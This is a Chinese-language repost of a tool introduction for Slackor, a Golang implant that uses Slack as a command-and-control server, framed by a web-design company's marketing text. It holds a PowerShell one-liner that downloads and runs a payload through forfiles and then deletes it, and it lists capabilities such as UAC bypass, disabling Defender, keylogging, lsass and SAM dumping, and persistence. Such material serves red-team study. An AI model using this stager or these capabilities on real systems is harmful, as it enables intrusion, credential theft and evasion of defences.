如何將Slack當(dāng)作你的命令控制服務(wù)器，相信很多沒(méi)有經(jīng)驗(yàn)的人對(duì)此束手無(wú)策，為此本文總結(jié)了問(wèn)題出現(xiàn)的原因和解決方法，通過(guò)這篇文章希望你能解決這個(gè)問(wèn)題。

創(chuàng)新互聯(lián)公司堅(jiān)持“要么做到，要么別承諾”的工作理念，服務(wù)領(lǐng)域包括：網(wǎng)站設(shè)計(jì)制作、成都網(wǎng)站設(shè)計(jì)、企業(yè)官網(wǎng)、英文網(wǎng)站、手機(jī)端網(wǎng)站、網(wǎng)站推廣等服務(wù)，滿足客戶(hù)于互聯(lián)網(wǎng)時(shí)代的新縣網(wǎng)站設(shè)計(jì)、移動(dòng)媒體設(shè)計(jì)的需求，幫助企業(yè)找到有效的互聯(lián)網(wǎng)解決方案。努力成為您成熟可靠的網(wǎng)絡(luò)建設(shè)合作伙伴！

Slackor

Slackor是一款Golang植入，它可以將Slack作為你的命令控制服務(wù)器。

注意：該工具目前僅處于概念驗(yàn)證模型階段，請(qǐng)?jiān)趧?chuàng)建任何Slack應(yīng)用之前，確保應(yīng)用符合Slack App開(kāi)發(fā)者政策。

工具安裝

Slackor服務(wù)器端采用Python 3開(kāi)發(fā)，在使用該工具之前，你需要滿足以下條件：

1、 一個(gè)Slack工作區(qū)；

2、 以下列權(quán)限注冊(cè)一個(gè)App：

channels:readchannels:historychannels:writefiles:write:userfiles:read

3、 創(chuàng)建一個(gè)BOT；

Slackor項(xiàng)目中包含五個(gè)文件：

1、install.sh：安裝依賴(lài)組件2、setup.py：這個(gè)腳本可以創(chuàng)建Slack信道、數(shù)據(jù)庫(kù)和植入程序3、agent.py：這個(gè)腳本可以生成新的植入程序4、server.py：Slack服務(wù)器，可在Linux平臺(tái)上運(yùn)行5、agent.go：Golang植入程序6、requirements.txt：Python依賴(lài)（自動(dòng)安裝）

快速開(kāi)始

go get github.com/Coalfire-Research/Slackorcd $GOPATH/src/github.com/Coalfire-Research/Slackor

運(yùn)行了上述命令之后，運(yùn)行“install.sh”文件，然后運(yùn)行“setup.py”，此時(shí)需要你提供Slack應(yīng)用程序的“OAuth訪問(wèn)令牌”以及 “Bot User OAuth訪問(wèn)令牌”。

成功運(yùn)行上述腳本之后，還需要在項(xiàng)目的dist/目錄中創(chuàng)建下列幾個(gè)文件：

agent.windows.exe:Windows 64-bit 代碼agent.upx.exe:Windows 64-bit 代碼, UPX 封裝agent.darwin:macOS 64-bit 代碼agent.32.linux:Linux 32-bit 代碼agent.64.linux:Linux 64-bit 代碼

在Linux主機(jī)上運(yùn)行server.py之后，工具會(huì)根據(jù)目標(biāo)主機(jī)的情況自動(dòng)選擇上述代理程序。

我們可以使用“stager”模塊來(lái)生成一個(gè)one-liner或其他Dropper：

powershell.exe iwr [URL] -o C:\Users\Public\[NAME].exe; forfiles.exe /p c:\windows\system32 /msvchost.exe /c C:\Users\Public\[NAME]; timeout 2; delC:\Users\Public\[NAME].exe

這條命令將會(huì)執(zhí)行InvokeWebRequest(PS v.3+)來(lái)下載Payload，并使用一個(gè)LOLBin來(lái)執(zhí)行它。執(zhí)行完成后，Payload會(huì)進(jìn)行自毀操作。這只是一個(gè)僅供參考的使用樣例，大家可以根據(jù)自己的需要來(lái)使用其他的下載方法或執(zhí)行方法。

工具使用

輸入“help”或按下TAB鍵，我們就可以查看到該工具所支持的全部可用命令了，我們還可以輸入“help [COMMAND]”來(lái)查看命令描述。

(Slackor：服務(wù)器端)help –顯示幫助菜單interact– 與代理端交互list –列出所有已注冊(cè)的代理remove– 終止或移除代理revive– 向所有的代理發(fā)送重新注冊(cè)信號(hào)stager– 生成一個(gè)One-Liner下載并執(zhí)行植入程序quit –退出程序wipefiles– 刪除Slack中的所有上傳文件

當(dāng)代理端就緒之后，我們就可以跟它進(jìn)行交互了。使用“interact [AGENT]”可以切換到代理端的命令行界面，然后輸入“help”或按下TAB鍵即可查看代理端支持的所有可用命令。

(Slackor：代理端)

常用命令

back –返回主菜單beacon– 修改代理確認(rèn)時(shí)間間隔（默認(rèn)為5秒）download– 從代理端下載文件至Slackor服務(wù)器help –顯示幫助菜單kill –終止代理sleep– 代理休眠sysinfo– 顯示當(dāng)前用戶(hù)、操作系統(tǒng)版本、系統(tǒng)架構(gòu)和CPU核心數(shù)upload– 從代理端上傳一份文件至Slackor 服務(wù)器wget –通過(guò)HTTP/HTTPS獲取任意文件Windows命令bypassuac– 生成一個(gè)高完整性的代理cleanup– 移除持久性組件clipboard– 獲取剪切板內(nèi)容defanger– 嘗試關(guān)閉WindowsDefenderduplicate– 生成代理端副本getsystem-使用NTAUTHORITY/SYSTEM權(quán)限生成代理keyscan– 在代理端開(kāi)啟鍵盤(pán)記錄器minidump–導(dǎo)出lsass.exe內(nèi)存信息并下載persist– 在ADS中創(chuàng)建持久性植入程序samdump– 嘗試導(dǎo)出SAM文件，以供離線提取哈希特征screenshot– 獲取屏幕截圖shellcode– 執(zhí)行x64元ShellcodeLinux命令screenshot- 獲取屏幕截圖

OPSEC

命令輸出和下載的文件都采用了AES加密，額外的還有Slack的TLS傳輸層加密。

在執(zhí)行需要向磁盤(pán)寫(xiě)入數(shù)據(jù)的任務(wù)時(shí)，模塊會(huì)給用戶(hù)發(fā)送提醒。在執(zhí)行Shell命令時(shí)，cmd.exe/bash將會(huì)被執(zhí)行，這種行為可能會(huì)被目標(biāo)主機(jī)監(jiān)控到。下面給出的是一些OPSEC安全命令，它們不會(huì)執(zhí)行cmd.exe/bash。

cat –打印文件內(nèi)容cd – 修改目錄find –搜索目錄文件名getip– 獲取外部IP地址(發(fā)送一個(gè)DNS 請(qǐng)求)hostname– 顯示主機(jī)名稱(chēng)ifconfig– 顯示接口信息ls – 列舉目錄內(nèi)容mkdir– 創(chuàng)建一個(gè)目錄pwd –輸出當(dāng)前工作目錄rm – 移除一個(gè)文件rmdir– 移除一個(gè)目錄whoami/ getuid – 輸出當(dāng)前用戶(hù)信息

看完上述內(nèi)容，你們掌握如何將Slack當(dāng)作你的命令控制服務(wù)器的方法了嗎？如果還想學(xué)到更多技能或想了解更多相關(guān)內(nèi)容，歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道，感謝各位的閱讀！

標(biāo)題名稱(chēng)：如何將Slack當(dāng)作你的命令控制服務(wù)器
路徑分享：http://vcdvsql.cn/article42/pegdhc.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供品牌網(wǎng)站設(shè)計(jì)、動(dòng)態(tài)網(wǎng)站、網(wǎng)站營(yíng)銷(xiāo)、Google、商城網(wǎng)站、微信公眾號(hào)

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶(hù)投稿、用戶(hù)轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來(lái)源： 創(chuàng)新互聯(lián)